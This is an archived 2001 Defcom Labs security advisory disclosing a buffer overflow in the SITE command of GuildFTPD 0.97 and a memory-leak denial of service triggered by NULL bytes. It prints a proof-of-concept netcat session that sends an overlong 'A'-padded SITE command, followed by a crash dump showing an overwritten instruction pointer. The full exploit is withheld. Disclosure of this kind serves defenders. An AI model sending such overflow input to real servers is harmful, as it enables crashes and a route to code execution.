OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: andreas junestam (andreas.junestamdefcom.com)
Date: Sun May 27 2001 - 15:37:06 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ======================================================================
                      Defcom Labs Advisory def-2001-27

                   GuildFTPD Buffer Overflow and Memory Leak DoS

    Author: Andreas Junestam <andreasdefcom.com>
    Co-Author: Janne Sarendal <jannedefcom.com>
    Release Date: 2001-05-22
    ======================================================================
    ------------------------=[Brief Description]=-------------------------
    GuildFTPD contains two different problems:
    1. Buffer overrun in the SITE command with the ability to execute
       arbitrary code
    2. A memory leak in the input parsing code

    ------------------------=[Affected Systems]=--------------------------
    - GuildFtpd v0.97 (probably earlier versions too)

    ----------------------=[Detailed Description]=------------------------
    * SITE command Buffer Overflow
      All the SITE commands are handled in a dll(sitecmd.dll) which suffers
      from a buffer overflow. By sending a site command greater than 261
      bytes, a buffer will overflow and it is possible to execute
      arbitrary code. We have choosen not to include the working exploit.

      C:\>nc 127.0.0.1 21
      220-GuildFTPD FTP Server (c) 1999,2000
      220-Version 0.97
      220 Please enter your name:
      user a
      331 User name okay, Need password.
      pass a
      230 User logged in.
      site AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

      Access violation - code c0000005 (first chance)
      eax=01450000 ebx=00000001 ecx=00000000 edx=00130608 esi=10030000
    edi=009ed9e0
      eip=41414141 esp=01bcf9b4 ebp=10030000 iopl=0 nv up ei pl nz
    na po nc
      cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
    efl=00010206

    * Memory Leak DoS
      The input parsing code in GuildFTPD contains a memory leak that will
      trigger if you send it a request containing a NULL(0x0) character.
      GuildFTPD will still answer new requests, but, eventually the server
      will run out of memory and the machine will crash.

    ---------------------------=[Workaround]=-----------------------------
    None for the moment

    -------------------------=[Vendor Response]=--------------------------
    This issue was brought to the developer's attention on the 24th of
    April,
    2001, no response so far.

    ======================================================================
                This release was brought to you by Defcom Labs UK

                  labsdefcom.com www.defcom.com
    ======================================================================